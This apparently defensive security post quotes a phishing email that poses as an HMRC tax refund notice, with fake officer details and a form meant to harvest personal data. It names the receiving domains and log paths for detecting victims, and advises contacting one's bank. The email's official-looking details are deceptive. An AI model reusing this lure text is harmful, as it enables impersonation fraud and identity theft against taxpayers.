RECALCULATION OF YOUR TAX REFUND

HMRC 2008-2009

LOCAL OFFICE No. 3819

TAX CREDIT OFFICER: NEIL ROBINSON

TAX REFUND ID NUMBER: 381716209

REFUND AMOUNT: 344.79

Dear Applicant,

The contents of this email and any attachments are confidential and as applicable, copyright in these is reserved to HM Revenue & Customs.

Unless expressly authorised by us, any further dissemination or distribution of this email or its attachments is prohibited.

If you are not the intended recipient of this email, please reply to inform us that you have received this email in error and then delete it without retaining any copy.

I am sending this email to announce: After the last annual calculation of your fiscal activity we have determined that you are eligible to receive a tax refund of 344.79

You have attached the tax return form with the TAX REFUND NUMBER ID: 381716209, complete the tax return form attached to this message.

After completing the form, please submit the form by clicking the SUBMIT button on form and allow us 5-9 business days in order to process it.

Our head office address can be found on our web site at http://www.hmrc.co.uk/

Sincerely,

NEIL ROBINSON

HMRC Tax Credit Officer

officer.robinson@hmrc.co.uk

Preston

PR1 0SB



There's an attachment in both cases that attempt to harvest personal details (basically everything you need for identity theft) and sends it off to the attacker. In this case, domains used are jub23bi.biz and xgen99.biz although there are probably others. Scanning your outbound log files for /luk.php or /luk1.php or .biz/luk might reveal anyone who has fallen for it.


Obviously, if you've entered you details into something like this then you need to contact your bank as soon as possible and explain that your account has been compromised.